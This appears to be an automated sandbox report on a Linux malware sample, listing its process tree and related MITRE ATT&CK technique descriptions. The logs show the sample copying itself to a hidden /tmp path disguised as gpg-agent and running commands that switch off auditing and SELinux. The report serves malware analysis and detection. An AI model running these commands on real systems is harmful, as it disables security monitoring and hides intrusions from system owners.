Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6693, Parent PID: 6689

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6693, Parent PID: 6689

General

Start time (UTC):	11:02:26
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6701, Parent PID: 6269

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6701, Parent PID: 6269

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6703, Parent PID: 6701

General

Start time (UTC):	11:02:28
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6703, Parent PID: 6701

General

Start time (UTC):	11:02:28
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6704, Parent PID: 6701

General

Start time (UTC):	11:02:28
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6704, Parent PID: 6701

General

Start time (UTC):	11:02:28
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6702, Parent PID: 6269

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6702, Parent PID: 6269

General

Start time (UTC):	11:02:28
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "killall -9 obfs4proxy;pkill -9 obfs4proxy"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6705, Parent PID: 6702

General

Start time (UTC):	11:02:28
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: killall PID: 6705, Parent PID: 6702

General

Start time (UTC):	11:02:28
Start date (UTC):	10/10/2024
Path:	/usr/bin/killall
Arguments:	killall -9 obfs4proxy
File size:	32024 bytes
MD5 hash:	cd2adedbee501869ac691b88af39cd8b

Analysis Process: sh PID: 6714, Parent PID: 6702

General

Start time (UTC):	11:02:32
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: pkill PID: 6714, Parent PID: 6702

General

Start time (UTC):	11:02:32
Start date (UTC):	10/10/2024
Path:	/usr/bin/pkill
Arguments:	pkill -9 obfs4proxy
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

Analysis Process: raid5wq PID: 6708, Parent PID: 6269

General

Start time (UTC):	11:02:29
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6708, Parent PID: 6269

General

Start time (UTC):	11:02:29
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6709, Parent PID: 6708

General

Start time (UTC):	11:02:29
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6709, Parent PID: 6708

General

Start time (UTC):	11:02:29
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6710, Parent PID: 6708

General

Start time (UTC):	11:02:29
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6710, Parent PID: 6708

General

Start time (UTC):	11:02:29
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6711, Parent PID: 6269

General

Start time (UTC):	11:02:30
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6711, Parent PID: 6269

General

Start time (UTC):	11:02:30
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6712, Parent PID: 6711

General

Start time (UTC):	11:02:31
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6712, Parent PID: 6711

General

Start time (UTC):	11:02:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6713, Parent PID: 6711

General

Start time (UTC):	11:02:31
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6713, Parent PID: 6711

General

Start time (UTC):	11:02:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6715, Parent PID: 6269

General

Start time (UTC):	11:02:32
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6715, Parent PID: 6269

General

Start time (UTC):	11:02:32
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6719, Parent PID: 6715

General

Start time (UTC):	11:02:33
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6719, Parent PID: 6715

General

Start time (UTC):	11:02:33
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6720, Parent PID: 6715

General

Start time (UTC):	11:02:33
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6720, Parent PID: 6715

General

Start time (UTC):	11:02:33
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6721, Parent PID: 6269

General

Start time (UTC):	11:02:34
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6721, Parent PID: 6269

General

Start time (UTC):	11:02:34
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6726, Parent PID: 6721

General

Start time (UTC):	11:02:35
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6726, Parent PID: 6721

General

Start time (UTC):	11:02:35
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6727, Parent PID: 6721

General

Start time (UTC):	11:02:35
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6727, Parent PID: 6721

General

Start time (UTC):	11:02:35
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: systemd PID: 6315, Parent PID: 1

General

Start time (UTC):	11:00:52
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: true PID: 6315, Parent PID: 1

General

Start time (UTC):	11:00:52
Start date (UTC):	10/10/2024
Path:	/bin/true
Arguments:	/bin/true
File size:	39256 bytes
MD5 hash:	589a58ff455dbd092cb3ba3dd2c4c63e

Analysis Process: systemd PID: 6324, Parent PID: 6323

General

Start time (UTC):	11:00:55
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: snapd-env-generator PID: 6324, Parent PID: 6323

General

Start time (UTC):	11:00:55
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Analysis Process: systemd PID: 6332, Parent PID: 6331

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: snapd-env-generator PID: 6332, Parent PID: 6331

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Analysis Process: systemd PID: 6336, Parent PID: 6335

General

Start time (UTC):	11:00:57
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: snapd-env-generator PID: 6336, Parent PID: 6335

General

Start time (UTC):	11:00:57
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Analysis Process: systemd PID: 6442, Parent PID: 1

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 6442, Parent PID: 1

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -t
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 6465, Parent PID: 1

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 6465, Parent PID: 1

General

Start time (UTC):	11:01:28
Start date (UTC):	10/10/2024
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -D
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 6468, Parent PID: 6467

General

Start time (UTC):	11:01:29
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: snapd-env-generator PID: 6468, Parent PID: 6467

General

Start time (UTC):	11:01:29
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Analysis Process: systemd PID: 6474, Parent PID: 6473

General

Start time (UTC):	11:01:30
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: snapd-env-generator PID: 6474, Parent PID: 6473

General

Start time (UTC):	11:01:30
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Analysis Process: systemd PID: 6477, Parent PID: 1

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: journalctl PID: 6477, Parent PID: 1

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/journalctl
Arguments:	/usr/bin/journalctl --smart-relinquish-var
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Analysis Process: systemd PID: 6478, Parent PID: 1

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: perfcc PID: 6478, Parent PID: 1

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/bin/perfcc
Arguments:	/bin/perfcc
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: perfcc PID: 6484, Parent PID: 6478

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/bin/perfcc
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6484, Parent PID: 6478

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf CLK_TCK
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: perfcc PID: 6489, Parent PID: 6478

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/bin/perfcc
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6489, Parent PID: 6478

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf PAGESIZE
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: perfcc PID: 6490, Parent PID: 6478

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/bin/perfcc
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6490, Parent PID: 6478

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "PATH=/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;nohup /usr/bin/perfcc >/dev/null 2>/dev/null & exit"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6491, Parent PID: 6490

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: nohup PID: 6491, Parent PID: 1

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/usr/bin/nohup
Arguments:	nohup /usr/bin/perfcc
File size:	43352 bytes
MD5 hash:	d8d3ce4d7f4b1e3ac3c3e7c9790f22ca

Analysis Process: perfcc PID: 6491, Parent PID: 1

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/usr/bin/perfcc
Arguments:	/usr/bin/perfcc
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: perfcc PID: 6496, Parent PID: 6491

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/usr/bin/perfcc
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6496, Parent PID: 6491

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf CLK_TCK
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: perfcc PID: 6500, Parent PID: 6491

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/usr/bin/perfcc
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6500, Parent PID: 6491

General

Start time (UTC):	11:01:32
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf PAGESIZE
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: perfcc PID: 6670, Parent PID: 6491

General

Start time (UTC):	11:02:20
Start date (UTC):	10/10/2024
Path:	/usr/bin/perfcc
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6670, Parent PID: 6491

General

Start time (UTC):	11:02:20
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "cp /proc/6491/exe /tmp/.perf.c/gpg-agent && chmod +x /tmp/.perf.c/gpg-agent"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6671, Parent PID: 6670

General

Start time (UTC):	11:02:20
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cp PID: 6671, Parent PID: 6670

General

Start time (UTC):	11:02:20
Start date (UTC):	10/10/2024
Path:	/usr/bin/cp
Arguments:	cp /proc/6491/exe /tmp/.perf.c/gpg-agent
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Analysis Process: sh PID: 6682, Parent PID: 6670

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: chmod PID: 6682, Parent PID: 6670

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /tmp/.perf.c/gpg-agent
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: perfcc PID: 6683, Parent PID: 6491

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/perfcc
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6683, Parent PID: 6491

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "PATH=/tmp/.perf.c:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;gpg-agent --supervised &"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6684, Parent PID: 6683

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: gpg-agent PID: 6684, Parent PID: 1

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/gpg-agent
Arguments:	gpg-agent --supervised
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: gpg-agent PID: 6690, Parent PID: 6684

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/gpg-agent
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6690, Parent PID: 6684

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf CLK_TCK
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: gpg-agent PID: 6694, Parent PID: 6684

General

Start time (UTC):	11:02:26
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/gpg-agent
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6694, Parent PID: 6684

General

Start time (UTC):	11:02:26
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf PAGESIZE
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: gpg-agent PID: 6697, Parent PID: 6684

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/gpg-agent
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6697, Parent PID: 6684

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "auditctl -e0"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: gpg-agent PID: 6698, Parent PID: 6684

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/gpg-agent
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6698, Parent PID: 6684

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "echo 0 > /sys/fs/selinux/enforce"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: gpg-agent PID: 6700, Parent PID: 6684

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/gpg-agent
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6700, Parent PID: 6684

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "setenforce 0"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemd PID: 6485, Parent PID: 1

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: systemd-journald PID: 6485, Parent PID: 1

General

Start time (UTC):	11:01:31
Start date (UTC):	10/10/2024
Path:	/lib/systemd/systemd-journald
Arguments:	/lib/systemd/systemd-journald
File size:	162032 bytes
MD5 hash:	474667ece6cecb5e04c6eb897a1d0d9e

Analysis Process: systemd PID: 6572, Parent PID: 1

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: journalctl PID: 6572, Parent PID: 1

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/usr/bin/journalctl
Arguments:	/usr/bin/journalctl --flush
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Analysis Process: systemd PID: 6586, Parent PID: 1

General

Start time (UTC):	11:01:56
Start date (UTC):	10/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: unattended-upgrade-shutdown PID: 6586, Parent PID: 1

General

Start time (UTC):	11:01:56
Start date (UTC):	10/10/2024
Path:	/usr/share/unattended-upgrades/unattended-upgrade-shutdown
Arguments:	/usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
File size:	5490352 bytes
MD5 hash:	69f442c3e33b5f9a66b722c29ad89435

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

